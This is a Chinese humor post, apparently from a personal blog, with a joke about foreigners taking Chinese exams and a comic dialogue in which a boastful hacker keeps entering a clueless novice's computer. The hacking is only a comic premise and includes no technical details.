等咱中国强大了,全叫老外考中文四六级!文言文太简单,全用毛笔答题,这是便宜他们。惹急了一人一把刀一个龟壳,刻甲骨文!论文题目就叫:论三个代表!到了考听力的时候全用周杰伦的歌,《双截棍》听两遍,《菊花台》只能听一遍。告诉他们这是中国人说话最正常的语速!阅读理解全是政府工作报告,口试要求唱京剧,实验就考包粽子。
47.黑客:我控制了你的电脑
小白:怎么控制的?
黑客:用木马
小白:。。。。。。在哪里?我没看不见
黑客:打开你的任务管理器
小白:。。。。。。。任务管理器在哪?
黑客:。。。。。你的电脑下面!!
小白:“我的电脑”里面没有啊
黑客:算了,当我什么也没做过
黑客:我已经控制了你的电脑
小白:哦
黑客:害怕了吧?!嘿嘿
小白:来的正好,帮我杀杀毒吧,最近我的机子毛病很多耶
黑客:。。。。。。
小白:你怎么总是在我电脑里随便进进出出
黑客:你可以装防火墙
小白:装防火墙,你就不能进入了吗?
黑客:不啊,我只是想增加点趣味性,这样控制你的电脑让我觉得很白痴耶
小白:听说你会制造“病毒”?!
黑客:嗯
小白:你可以控制别人的电脑?!
黑客:一般是的
小白:那你可以黑掉那些网站吗?
黑客:当然,没听到人家叫我“黑客”吗?
小白:。。。。哦~~~`我还以为那是因为你长得很黑。。。。。
“咣~~”
黑客:我又来了!!
小白:你天天进来,不觉得很烦吗?
黑客:是很烦,你的机子是我见过的最烂的一台了
小白:不是吧,这可是名牌
黑客:我是说你的机子里除了弱智游戏就只有病毒了
小白:哦~~那你看到我的“连连看”了吗,不记得装在哪,找了好久了耶
黑客:。。。。。再见
黑客:嗨~~~我来了!
小白:好几天不见你,被我的防火墙挡住啦?
黑客:哈哈,笑话,上你的机子比我自己的还容易,不是想我了吧
小白:我是想请你帮一个忙
黑客:什么事?
小白:你能不能进入电力系统修改一点数据
黑客:。。。。。。你想干嘛!!
小白:求求你,帮我把我家这个月的电费消了吧。。。。。。
黑客:去死!!
黑客:你死哪去了?!!!
小白:。。。。出去玩了几天啊,找我干嘛
黑客:我要找点东西
小白:在我这儿找什么东西?
黑客:病毒,找一条前几年的老病毒,只有你的机子上病毒保存的最全啦
黑客:我来了!!
。。。。。。
黑客:怎么不说话?
小白:心情不好
黑客:谁欺负你了?
小白:我的一个Q号搞丢了,里面有我的网上初恋
黑客:这个简单,我帮你拿回来
小白:拿不回来了
黑客:不可能,告诉我,多少号?
小白:呜~~~~就是不记得了
小白:你给我出来!!!!
黑客:怎么啦?!
小白:你是不是用我的ID去论坛玩了?!!
黑客:。。。。不好意思,忘了告诉你了,不过,我没干坏事,就瞎编了个贴子,我保证下次再也不玩了
小白:那不行!!!
黑客:你还要怎么样?
小白:你发的贴子得红脸了耶,我第一次得红脸,好开心哦,你必须再给我编一个
黑客:倒!
黑客:嘿嘿,刚才我做了一件很有趣的事
小白:什么事
黑客:我到论坛上去顶贴了
小白:这很平常啊
黑客:我见贴就顶,尽情的骂楼主是猪,好解气
小白:哇塞,太过瘾了,我可从来不敢,会被封杀的!
黑客:没错,已经被封杀了。
小白:这还有趣?!
黑客:是啊,因为我用的是你的ID
小白:你是高手吗?
黑客:可以说是吧。
小白:高到什么程度?
黑客:嗯,我无聊的时候就自己黑自己
小白:哈,这个我也会!
黑客:#¥%!你也可以?!
小白:是啊,一关机它就黑了。。。。。
黑客:滚!
全是我空间里的